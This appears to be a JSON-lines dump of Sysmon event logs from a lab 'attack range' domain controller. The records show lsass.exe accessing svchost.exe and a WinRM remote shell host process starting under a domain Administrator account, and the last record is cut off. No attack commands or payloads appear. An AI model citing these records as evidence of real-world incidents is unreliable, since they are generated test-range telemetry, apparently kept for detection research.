{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5276,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.212\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.212","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5277,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.212\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.212","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5278,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.212\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.212","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5279,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5280,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5281,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.478","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5282,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.481\r\nProcessGuid: {E2A3D6B1-11D2-5F25-0000-001007BB0700}\r\nProcessId: 484\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D2-5F25-0000-0020BBBA0700}\r\nLogonId: 0x7BABB\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.481","ProcessGuid":"{E2A3D6B1-11D2-5F25-0000-001007BB0700}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D2-5F25-0000-0020BBBA0700}","LogonId":"0x7babb","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:55:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5283,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.478\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-001007BB0700}\r\nTargetProcessId: 484\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 